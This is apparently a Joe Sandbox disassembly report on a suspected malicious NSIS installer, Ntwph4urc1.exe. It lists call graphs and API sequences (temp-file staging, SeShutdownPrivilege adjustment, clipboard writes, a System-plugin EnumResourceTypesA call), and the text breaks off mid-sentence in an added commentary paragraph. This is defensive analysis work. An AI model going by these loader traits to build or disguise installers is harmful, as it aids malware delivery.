5123 40543c CallWindowProcW 5126 4053ea 5123->5126 5124->5126 5131 404cff SendMessageW 5125->5131 5128->5123 5136 404d7f 5128->5136 5130->5123 5132 404d22 GetMessagePos ScreenToClient SendMessageW 5131->5132 5133 404d5e SendMessageW 5131->5133 5134 404d56 5132->5134 5135 404d5b 5132->5135 5133->5134 5134->5128 5135->5133 5145 4063ee lstrcpynW 5136->5145 5138 404d92 5146 406335 wsprintfW 5138->5146 5140 404d9c 5141 40140b 2 API calls 5140->5141 5142 404da5 5141->5142 5147 4063ee lstrcpynW 5142->5147 5144 404dac 5144->5130 5145->5138 
5146->5140 5147->5144 5151 4016cc 5152 402d3e 17 API calls 5151->5152 5153 4016d2 GetFullPathNameW 5152->5153 5154 40170e 5153->5154 5155 4016ec 5153->5155 5156 402bc2 5154->5156 5157 401723 GetShortPathNameW 5154->5157 5155->5154 5158 40674c 2 API calls 5155->5158 5157->5156 5159 4016fe 5158->5159 5159->5154 5161 4063ee lstrcpynW 5159->5161 5161->5154 5162 401e4e GetDC 5163 402d1c 17 API calls 5162->5163 5164 401e60 GetDeviceCaps MulDiv ReleaseDC 5163->5164 5165 402d1c 17 API calls 5164->5165 5166 401e91 5165->5166 5167 40642b 17 API calls 5166->5167 5168 401ece CreateFontIndirectW 5167->5168 5169 402630 5168->5169 5170 402acf 5171 402d1c 17 API calls 5170->5171 5172 402ad5 5171->5172 5173 402b12 5172->5173 5174 402ae7 5172->5174 5175 402925 5172->5175 5173->5175 5176 40642b 17 API calls 5173->5176 5174->5175 5178 406335 wsprintfW 5174->5178 5176->5175 5178->5175 4731 4020d0 4732 4020e2 4731->4732 4733 402194 4731->4733 4734 402d3e 17 API calls 4732->4734 4735 401423 24 API calls 4733->4735 4736 4020e9 4734->4736 4741 4022ee 4735->4741 4737 402d3e 17 API calls 4736->4737 4738 4020f2 4737->4738 4739 402108 LoadLibraryExW 4738->4739 4740 4020fa GetModuleHandleW 4738->4740 4739->4733 4742 402119 4739->4742 4740->4739 4740->4742 4754 406852 4742->4754 4745 402163 4747 405456 24 API calls 4745->4747 4746 40212a 4748 402132 4746->4748 4749 402149 4746->4749 4750 40213a 4747->4750 4751 401423 24 API calls 4748->4751 4759 74351777 4749->4759 4750->4741 4752 402186 FreeLibrary 4750->4752 4751->4750 4752->4741 4801 406410 WideCharToMultiByte 4754->4801 4756 40686f 4757 406876 GetProcAddress 4756->4757 4758 402124 4756->4758 4757->4758 4758->4745 4758->4746 4760 743517aa 4759->4760 4802 74351b5f 4760->4802 4762 743517b1 4763 743518d6 4762->4763 4764 743517c2 4762->4764 4765 743517c9 4762->4765 4763->4750 4852 7435239e 4764->4852 4836 743523e0 4765->4836 4770 743517ee 4771 7435182d 4770->4771 4772 7435180f 4770->4772 4776 74351833 4771->4776 4777 7435187e 4771->4777 4865 
743525b5 4772->4865 4773 743517df 4780 743517e5 4773->4780 4781 743517f0 4773->4781 4774 743517f8 4774->4770 4862 74352d83 4774->4862 4884 743515c6 4776->4884 4778 743525b5 10 API calls 4777->4778 4785 7435186f 4778->4785 4779 74351815 4876 743515b4 4779->4876 4780->4770 4846 74352af8 4780->4846 4856 74352770 4781->4856 4792 743518c5 4785->4792 4890 74352578 4785->4890 4790 743517f6 4790->4770 4791 743525b5 10 API calls 4791->4785 4792->4763 4796 743518cf GlobalFree 4792->4796 4796->4763 4798 743518b1 4798->4792 4894 7435153d wsprintfW 4798->4894 4799 743518aa FreeLibrary 4799->4798 4801->4756 4897 7435121b GlobalAlloc 4802->4897 4804 74351b86 4898 7435121b GlobalAlloc 4804->4898 4806 74351dcb GlobalFree GlobalFree GlobalFree 4807 74351de8 4806->4807 4825 74351e32 4806->4825 4809 743521de 4807->4809 4815 74351dfd 4807->4815 4807->4825 4808 74351c86 GlobalAlloc 4821 74351b91 4808->4821 4810 74352200 GetModuleHandleW 4809->4810 4809->4825 4813 74352226 4810->4813 4814 74352211 LoadLibraryW 4810->4814 4811 74351cd1 lstrcpyW 4817 74351cdb lstrcpyW 4811->4817 4812 74351cef GlobalFree 4812->4821 4905 7435161d WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 4813->4905 4814->4813 4814->4825 4815->4825 4901 7435122c 4815->4901 4817->4821 4818 74352278 4820 74352285 lstrlenW 4818->4820 4818->4825 4819 74352086 4904 7435121b GlobalAlloc 4819->4904 4906 7435161d WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 4820->4906 4821->4806 4821->4808 4821->4811 4821->4812 4821->4817 4821->4819 4824 7435210e 4821->4824 4821->4825 4828 74351fc7 GlobalFree 4821->4828 4830 7435122c 2 API calls 4821->4830 4831 74351d2d 4821->4831 4824->4825 4832 74352176 lstrcpyW 4824->4832 4825->4762 4826 74352238 4826->4818 4835 74352262 GetProcAddress 4826->4835 4828->4821 4829 7435229f 4829->4825 4830->4821 4831->4821 4899 7435158f GlobalSize GlobalAlloc 4831->4899 4832->4825 4834 7435208f 4834->4762 4835->4818 4838 743523f8 4836->4838 4837 
7435122c GlobalAlloc lstrcpynW 4837->4838 4838->4837 4840 74352521 GlobalFree 4838->4840 4842 743524a0 GlobalAlloc WideCharToMultiByte 4838->4842 4843 743524cb GlobalAlloc CLSIDFromString 4838->4843 4845 743524ea 4838->4845 4908 743512ba 4838->4908 4840->4838 4841 743517cf 4840->4841 4841->4770 4841->4773 4841->4774 4842->4840 4843->4840 4845->4840 4912 74352704 4845->4912 4847 74352b0a 4846->4847 4848 74352baf CreateFileA 4847->4848 4851 74352bcd 4848->4851 4850 74352c99 4850->4770 4915 74352aa2 4851->4915 4853 743523b3 4852->4853 4854 743523be GlobalAlloc 4853->4854 4855 743517c8 4853->4855 4854->4853 4855->4765 4860 743527a0 4856->4860 4857 7435284e 4859 74352854 GlobalSize 4857->4859 4861 7435285e 4857->4861 4858 7435283b GlobalAlloc 4858->4861 4859->4861 4860->4857 4860->4858 4861->4790 4863 74352d8e 4862->4863 4864 74352dce GlobalFree 4863->4864 4919 7435121b GlobalAlloc 4865->4919 4867 74352638 MultiByteToWideChar 4873 743525bf 4867->4873 4868 7435266b lstrcpynW 4868->4873 4869 7435265a StringFromGUID2 4869->4873 4870 7435267e wsprintfW 4870->4873 4871 743526a2 GlobalFree 4871->4873 4872 743526d7 GlobalFree 4872->4779 4873->4867 4873->4868 4873->4869 4873->4870 4873->4871 4873->4872 4874 74351272 2 API calls 4873->4874 4920 743512e1 4873->4920 4874->4873 4924 7435121b GlobalAlloc 4876->4924 4878 743515b9 4879 743515c6 2 API calls 4878->4879 4880 743515c3 4879->4880 4881 74351272 4880->4881 4882 743512b5 GlobalFree 4881->4882 4883 7435127b GlobalAlloc lstrcpynW 4881->4883 4882->4785 4883->4882 4885 743515d2 wsprintfW 4884->4885 4886 743515ff lstrcpyW 4884->4886 4889 74351618 4885->4889 4886->4889 4889->4791 4891 74352586 4890->4891 4893 74351891 4890->4893 4892 743525a2 GlobalFree 4891->4892 4891->4893 4892->4891 4893->4798 4893->4799 4895 74351272 2 API calls 4894->4895 4896 7435155e 4895->4896 4896->4792 4897->4804 4898->4821 4900 743515ad 4899->4900 4900->4831 4907 7435121b GlobalAlloc 4901->4907 4903 7435123b lstrcpynW 4903->4825 4904->4834 4905->4826 
4906->4829 4907->4903 4909 743512c1 4908->4909 4910 7435122c 2 API calls 4909->4910 4911 743512df 4910->4911 4911->4838 4913 74352712 VirtualAlloc 4912->4913 4914 74352768 4912->4914 4913->4914 4914->4845 4916 74352aad 4915->4916 4917 74352ab2 GetLastError 4916->4917 4918 74352abd 4916->4918 4917->4918 4918->4850 4919->4873 4921 7435130c 4920->4921 4922 743512ea 4920->4922 4921->4873 4922->4921 4923 743512f0 lstrcpyW 4922->4923 4923->4921 4924->4878 5179 4028d5 5180 4028dd 5179->5180 5181 4028e1 FindNextFileW 5180->5181 5183 4028f3 5180->5183 5182 40293a 5181->5182 5181->5183 5185 4063ee lstrcpynW 5182->5185 5185->5183 5186 74352ca3 5187 74352cbb 5186->5187 5188 7435158f 2 API calls 5187->5188 5189 74352cd6 5188->5189 5190 401956 5191 402d3e 17 API calls 5190->5191 5192 40195d lstrlenW 5191->5192 5193 402630 5192->5193 4980 4014d7 4985 402d1c 4980->4985 4982 4014dd Sleep 4984 402bc2 4982->4984 4986 40642b 17 API calls 4985->4986 4987 402d31 4986->4987 4987->4982 5011 40175c 5012 402d3e 17 API calls 5011->5012 5013 401763 5012->5013 5014 405f13 2 API calls 5013->5014 5015 40176a 5014->5015 5016 405f13 2 API calls 5015->5016 5016->5015 5194 401d5d 5195 402d1c 17 API calls 5194->5195 5196 401d6e SetWindowLongW 5195->5196 5197 402bc2 5196->5197 5017 401ede 5018 402d1c 17 API calls 5017->5018 5019 401ee4 5018->5019 5020 402d1c 17 API calls 5019->5020 5021 401ef0 5020->5021 5022 401f07 EnableWindow 5021->5022 5023 401efc ShowWindow 5021->5023 5024 402bc2 5022->5024 5023->5024 5198 401563 5199 402b08 5198->5199 5202 406335 wsprintfW 5199->5202 5201 402b0d 5202->5201 5203 4026e4 5204 402d1c 17 API calls 5203->5204 5211 4026f3 5204->5211 5205 402830 5206 40273d ReadFile 5206->5205 5206->5211 5207 405f67 ReadFile 5207->5211 5209 402832 5225 406335 wsprintfW 5209->5225 5210 40277d MultiByteToWideChar 5210->5211 5211->5205 5211->5206 5211->5207 5211->5209 5211->5210 5213 4027a3 SetFilePointer MultiByteToWideChar 5211->5213 5215 402843 5211->5215 5216 405fc5 SetFilePointer 
5211->5216 5213->5211 5214 402864 SetFilePointer 5214->5205 5215->5205 5215->5214 5217 405ff9 5216->5217 5218 405fe1 5216->5218 5217->5211 5219 405f67 ReadFile 5218->5219 5220 405fed 5219->5220 5220->5217 5221 406002 SetFilePointer 5220->5221 5222 40602a SetFilePointer 5220->5222 5221->5222 5223 40600d 5221->5223 5222->5217 5224 405f96 WriteFile 5223->5224 5224->5217 5225->5205 5226 401968 5227 402d1c 17 API calls 5226->5227 5228 40196f 5227->5228 5229 402d1c 17 API calls 5228->5229 5230 40197c 5229->5230 5231 402d3e 17 API calls 5230->5231 5232 401993 lstrlenW 5231->5232 5233 4019a4 5232->5233 5234 4019e5 5233->5234 5238 4063ee lstrcpynW 5233->5238 5236 4019d5 5236->5234 5237 4019da lstrlenW 5236->5237 5237->5234 5238->5236 5239 40166a 5240 402d3e 17 API calls 5239->5240 5241 401670 5240->5241 5242 40674c 2 API calls 5241->5242 5243 401676 5242->5243 4565 403e6b 4566 403e83 4565->4566 4567 403fbe 4565->4567 4566->4567 4570 403e8f 4566->4570 4568 40400f 4567->4568 4569 403fcf GetDlgItem GetDlgItem 4567->4569 4574 404069 4568->4574 4582 401389 2 API calls 4568->4582 4573 404344 18 API calls 4569->4573 4571 403e9a SetWindowPos 4570->4571 4572 403ead 4570->4572 4571->4572 4575 403eb2 ShowWindow 4572->4575 4576 403eca 4572->4576 4577 403ff9 SetClassLongW 4573->4577 4578 404390 SendMessageW 4574->4578 4628 403fb9 4574->4628 4575->4576 4579 403ed2 DestroyWindow 4576->4579 4580 403eec 4576->4580 4581 40140b 2 API calls 4577->4581 4625 40407b 4578->4625 4587 4042cd 4579->4587 4583 403ef1 SetWindowLongW 4580->4583 4584 403f02 4580->4584 4581->4568 4585 404041 4582->4585 4583->4628 4589 403fab 4584->4589 4590 403f0e GetDlgItem 4584->4590 4585->4574 4591 404045 SendMessageW 4585->4591 4586 40140b 2 API calls 4586->4625 4592 4042fe ShowWindow 4587->4592 4587->4628 4588 4042cf DestroyWindow EndDialog 4588->4587 4645 4043ab 4589->4645 4593 403f21 SendMessageW IsWindowEnabled 4590->4593 4594 403f3e 4590->4594 4591->4628 4592->4628 4593->4594 4593->4628 4597 403f4b 4594->4597 4598 
403f92 SendMessageW 4594->4598 4599 403f5e 4594->4599 4607 403f43 4594->4607 4596 40642b 17 API calls 4596->4625 4597->4598 4597->4607 4598->4589 4601 403f66 4599->4601 4602 403f7b 4599->4602 4604 40140b 2 API calls 4601->4604 4605 40140b 2 API calls 4602->4605 4603 403f79 4603->4589 4604->4607 4608 403f82 4605->4608 4606 404344 18 API calls 4606->4625 4642 40431d 4607->4642 4608->4589 4608->4607 4610 4040f6 GetDlgItem 4611 404113 ShowWindow KiUserCallbackDispatcher 4610->4611 4612 40410b 4610->4612 4639 404366 KiUserCallbackDispatcher 4611->4639 4612->4611 4614 40413d EnableWindow 4619 404151 4614->4619 4615 404156 GetSystemMenu EnableMenuItem SendMessageW 4616 404186 SendMessageW 4615->4616 4615->4619 4616->4619 4618 403e4c 18 API calls 4618->4619 4619->4615 4619->4618 4640 404379 SendMessageW 4619->4640 4641 4063ee lstrcpynW 4619->4641 4621 4041b5 lstrlenW 4622 40642b 17 API calls 4621->4622 4623 4041cb SetWindowTextW 4622->4623 4624 401389 2 API calls 4623->4624 4624->4625 4625->4586 4625->4588 4625->4596 4625->4606 4626 40420f DestroyWindow 4625->4626 4625->4628 4636 404344 4625->4636 4626->4587 4627 404229 CreateDialogParamW 4626->4627 4627->4587 4629 40425c 4627->4629 4630 404344 18 API calls 4629->4630 4631 404267 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4630->4631 4632 401389 2 API calls 4631->4632 4633 4042ad 4632->4633 4633->4628 4634 4042b5 ShowWindow 4633->4634 4635 404390 SendMessageW 4634->4635 4635->4587 4637 40642b 17 API calls 4636->4637 4638 40434f SetDlgItemTextW 4637->4638 4638->4610 4639->4614 4640->4619 4641->4621 4643 404324 4642->4643 4644 40432a SendMessageW 4642->4644 4643->4644 4644->4603 4646 4043c3 GetWindowLongW 4645->4646 4647 40446e 4645->4647 4646->4647 4648 4043d8 4646->4648 4647->4628 4648->4647 4649 404405 GetSysColor 4648->4649 4650 404408 4648->4650 4649->4650 4651 404418 SetBkMode 4650->4651 4652 40440e SetTextColor 4650->4652 4653 404430 GetSysColor 4651->4653 4654 404436 4651->4654 4652->4651 4653->4654 4655 

Control-flow Graph (graph image not reproduced; nodes are marked Executed or Not Executed)
                                            APIs
                                            • SetErrorMode.KERNELBASE ref: 004034C5
                                            • GetVersion.KERNEL32 ref: 004034CB
                                            • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004034FE
                                            • #17.COMCTL32(?,00000007,00000009,0000000B), ref: 0040353B
                                            • OleInitialize.OLE32(00000000), ref: 00403542
                                            • SHGetFileInfoW.SHELL32(0079FF08,00000000,?,000002B4,00000000), ref: 0040355E
                                            • GetCommandLineW.KERNEL32(007A7A60,NSIS Error,?,00000007,00000009,0000000B), ref: 00403573
                                            • CharNextW.USER32(00000000,"C:\Users\user\Desktop\Ntwph4urc1.exe",00000020,"C:\Users\user\Desktop\Ntwph4urc1.exe",00000000,?,00000007,00000009,0000000B), ref: 004035AB
                                              • Part of subcall function 004067E3: GetModuleHandleA.KERNEL32(?,00000020,?,00403514,0000000B), ref: 004067F5
                                              • Part of subcall function 004067E3: GetProcAddress.KERNEL32(00000000,?), ref: 00406810
                                            • GetTempPathW.KERNEL32(00000400,C:\Users\user~1\AppData\Local\Temp\,?,00000007,00000009,0000000B), ref: 004036E5
                                            • GetWindowsDirectoryW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,000003FB,?,00000007,00000009,0000000B), ref: 004036F6
                                            • lstrcatW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,\Temp,?,00000007,00000009,0000000B), ref: 00403702
                                            • GetTempPathW.KERNEL32(000003FC,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,\Temp,?,00000007,00000009,0000000B), ref: 00403716
                                            • lstrcatW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,Low,?,00000007,00000009,0000000B), ref: 0040371E
                                            • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,Low,?,00000007,00000009,0000000B), ref: 0040372F
                                            • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user~1\AppData\Local\Temp\,?,00000007,00000009,0000000B), ref: 00403737
                                            • DeleteFileW.KERNELBASE(1033,?,00000007,00000009,0000000B), ref: 0040374B
                                              • Part of subcall function 004063EE: lstrcpynW.KERNEL32(?,?,00000400,00403573,007A7A60,NSIS Error,?,00000007,00000009,0000000B), ref: 004063FB
                                            • OleUninitialize.OLE32(00000007,?,00000007,00000009,0000000B), ref: 00403816
                                            • ExitProcess.KERNEL32 ref: 00403837
                                            • lstrcatW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Ntwph4urc1.exe",00000000,00000007,?,00000007,00000009,0000000B), ref: 0040384A
                                            • lstrcatW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,0040A26C,C:\Users\user~1\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Ntwph4urc1.exe",00000000,00000007,?,00000007,00000009,0000000B), ref: 00403859
                                            • lstrcatW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,.tmp,C:\Users\user~1\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Ntwph4urc1.exe",00000000,00000007,?,00000007,00000009,0000000B), ref: 00403864
                                            • lstrcmpiW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user~1\AppData\Local\Temp\,.tmp,C:\Users\user~1\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Ntwph4urc1.exe",00000000,00000007,?,00000007,00000009,0000000B), ref: 00403870
                                            • SetCurrentDirectoryW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,?,00000007,00000009,0000000B), ref: 0040388C
                                            • DeleteFileW.KERNEL32(0079F708,0079F708,?,007A9000,00000009,?,00000007,00000009,0000000B), ref: 004038E6
                                            • CopyFileW.KERNEL32(C:\Users\user\Desktop\Ntwph4urc1.exe,0079F708,00000001,?,00000007,00000009,0000000B), ref: 004038FA
                                            • CloseHandle.KERNEL32(00000000,0079F708,0079F708,?,0079F708,00000000,?,00000007,00000009,0000000B), ref: 00403927
                                            • GetCurrentProcess.KERNEL32(00000028,0000000B,00000007,00000009,0000000B), ref: 00403956
                                            • OpenProcessToken.ADVAPI32(00000000), ref: 0040395D
                                            • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403972
                                            • AdjustTokenPrivileges.ADVAPI32 ref: 00403995
                                            • ExitWindowsEx.USER32(00000002,80040002), ref: 004039BA
                                            • ExitProcess.KERNEL32 ref: 004039DD
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1842919653.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                             • Associated: 00000005.00000002.1842895422.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842950813.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.000000000077C000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.0000000000782000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.0000000000786000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.0000000000789000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.00000000007A6000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.00000000007A9000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.00000000007AB000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.00000000007AE000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.00000000007C4000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.00000000007C6000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1843601762.00000000007C7000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_400000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID: lstrcat$FileProcess$Exit$CurrentDeleteDirectoryEnvironmentHandlePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeModuleNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpynlstrlen
                                            • String ID: "C:\Users\user\Desktop\Ntwph4urc1.exe"$.tmp$1033$C:\Users\user~1\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\inspires$C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\inspires$C:\Users\user\Desktop$C:\Users\user\Desktop\Ntwph4urc1.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$kernel32::EnumResourceTypesA(i 0,i r8,i 0)$~nsu
                                            • API String ID: 3441113951-3355597721
                                            • Opcode ID: ef7bc40cfc21a65b5c7abadd4c778368bce5dd0c15bdea56e8fa6b9d03db3f5a
                                            • Instruction ID: d7b9bf8e5ec5db16f392776339999e6c5d6af7d7718e861a4dfbc7241a8cc938
                                            • Opcode Fuzzy Hash: ef7bc40cfc21a65b5c7abadd4c778368bce5dd0c15bdea56e8fa6b9d03db3f5a
                                            • Instruction Fuzzy Hash: 65D1F6B1200310AAD7207F659D49B2B3AACEB81749F10843FF581B62D1DB7D8A55C76E

                                            Control-flow Graph

                                            control_flow_graph 139 405595-4055b0 140 4055b6-40567d GetDlgItem * 3 call 404379 call 404cd2 GetClientRect GetSystemMetrics SendMessageW * 2 139->140 141 40573f-405746 139->141 163 40569b-40569e 140->163 164 40567f-405699 SendMessageW * 2 140->164 143 405770-40577d 141->143 144 405748-40576a GetDlgItem CreateThread CloseHandle 141->144 146 40579b-4057a5 143->146 147 40577f-405785 143->147 144->143 151 4057a7-4057ad 146->151 152 4057fb-4057ff 146->152 149 4057c0-4057c9 call 4043ab 147->149 150 405787-405796 ShowWindow * 2 call 404379 147->150 160 4057ce-4057d2 149->160 150->146 157 4057d5-4057e5 ShowWindow 151->157 158 4057af-4057bb call 40431d 151->158 152->149 155 405801-405807 152->155 155->149 165 405809-40581c SendMessageW 155->165 161 4057f5-4057f6 call 40431d 157->161 162 4057e7-4057f0 call 405456 157->162 158->149 161->152 162->161 168 4056a0-4056ac SendMessageW 163->168 169 4056ae-4056c5 call 404344 163->169 164->163 170 405822-40584d CreatePopupMenu call 40642b AppendMenuW 165->170 171 40591e-405920 165->171 168->169 176 4056c7-4056db ShowWindow 169->176 177 4056fb-40571c GetDlgItem SendMessageW 169->177 178 405862-405877 TrackPopupMenu 170->178 179 40584f-40585f GetWindowRect 170->179 171->160 180 4056ea 176->180 181 4056dd-4056e8 ShowWindow 176->181 177->171 183 405722-40573a SendMessageW * 2 177->183 178->171 182 40587d-405894 178->182 179->178 184 4056f0-4056f6 call 404379 180->184 181->184 185 405899-4058b4 SendMessageW 182->185 183->171 184->177 185->185 186 4058b6-4058d9 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 185->186 188 4058db-405902 SendMessageW 186->188 188->188 189 405904-405918 GlobalUnlock SetClipboardData CloseClipboard 188->189 189->171
                                            APIs
                                            • GetDlgItem.USER32(?,00000403), ref: 004055F3
                                            • GetDlgItem.USER32(?,000003EE), ref: 00405602
                                            • GetClientRect.USER32(?,?), ref: 0040563F
                                            • GetSystemMetrics.USER32(00000002), ref: 00405646
                                            • SendMessageW.USER32(?,00001061,00000000,?), ref: 00405667
                                            • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 00405678
                                            • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 0040568B
                                            • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 00405699
                                            • SendMessageW.USER32(?,00001024,00000000,?), ref: 004056AC
                                            • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 004056CE
                                            • ShowWindow.USER32(?,00000008), ref: 004056E2
                                            • GetDlgItem.USER32(?,000003EC), ref: 00405703
                                            • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405713
                                            • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 0040572C
                                            • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405738
                                            • GetDlgItem.USER32(?,000003F8), ref: 00405611
                                              • Part of subcall function 00404379: SendMessageW.USER32(00000028,?,00000001,004041A4), ref: 00404387
                                            • GetDlgItem.USER32(?,000003EC), ref: 00405755
                                            • CreateThread.KERNEL32(00000000,00000000,Function_00005529,00000000), ref: 00405763
                                            • CloseHandle.KERNELBASE(00000000), ref: 0040576A
                                            • ShowWindow.USER32(00000000), ref: 0040578E
                                            • ShowWindow.USER32(?,00000008), ref: 00405793
                                            • ShowWindow.USER32(00000008), ref: 004057DD
                                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405811
                                            • CreatePopupMenu.USER32 ref: 00405822
                                            • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405836
                                            • GetWindowRect.USER32(?,?), ref: 00405856
                                            • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 0040586F
                                            • SendMessageW.USER32(?,00001073,00000000,?), ref: 004058A7
                                            • OpenClipboard.USER32(00000000), ref: 004058B7
                                            • EmptyClipboard.USER32 ref: 004058BD
                                            • GlobalAlloc.KERNEL32(00000042,00000000), ref: 004058C9
                                            • GlobalLock.KERNEL32(00000000), ref: 004058D3
                                            • SendMessageW.USER32(?,00001073,00000000,?), ref: 004058E7
                                            • GlobalUnlock.KERNEL32(00000000), ref: 00405907
                                            • SetClipboardData.USER32(0000000D,00000000), ref: 00405912
                                            • CloseClipboard.USER32 ref: 00405918
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1842919653.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                             • Associated: 00000005.00000002.1842895422.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842950813.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.000000000077C000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.0000000000782000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.0000000000786000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.0000000000789000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.00000000007A6000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.00000000007A9000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.00000000007AB000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.00000000007AE000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.00000000007C4000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.00000000007C6000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1843601762.00000000007C7000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_400000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                            • String ID: {
                                            • API String ID: 590372296-366298937
                                            • Opcode ID: 76257269951a7008dfdc90867c28ba5585546a04cccc1881335d18026b5b47bc
                                            • Instruction ID: ce320b3aa05de7a86cd71a66421b7d26801e1fa413e38a053d13c4a4e4f3a794
                                            • Opcode Fuzzy Hash: 76257269951a7008dfdc90867c28ba5585546a04cccc1881335d18026b5b47bc
                                            • Instruction Fuzzy Hash: 43B15BB1900608FFDB119F64DD89EAE7B79FB44354F00802AFA45B61A0CB794E51DFA8
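The two API listings above are the ones an analyst wants to post-process rather than read by hand: the installer's main routine ends in the OpenProcessToken / LookupPrivilegeValueW(SeShutdownPrivilege) / AdjustTokenPrivileges / ExitWindowsEx sequence that backs the "Contains functionality to shutdown / reboot the system" signature, and the details-window handler ends in OpenClipboard / EmptyClipboard / GlobalAlloc / SetClipboardData / CloseClipboard, which writes the list-view text to the clipboard (a write, not a read, whatever the signature name suggests). Both are ordinary NSIS installer behaviour ("NSIS Error", "~nsu", ".tmp" and "Low" are all NSIS stub strings), so neither sequence is evidence of the FormBook/GuLoader payload on its own; the verdict rests on the other signatures. The Python below is an added example, not part of the Joe Sandbox report or of NSIS: it parses lines in the shape of these listings, flags the privilege-adjust-then-ExitWindowsEx sequence, decodes the ExitWindowsEx arguments shown on this page (00000002, 80040002) against the documented Win32 EWX_* and SHTDN_REASON_* constants, and names the clipboard format passed to SetClipboardData (0000000D). The sample listing embedded in the block is constructed from lines on this page; the ApiCall structure, rule names and the regular expression are the example's own assumptions about the listing 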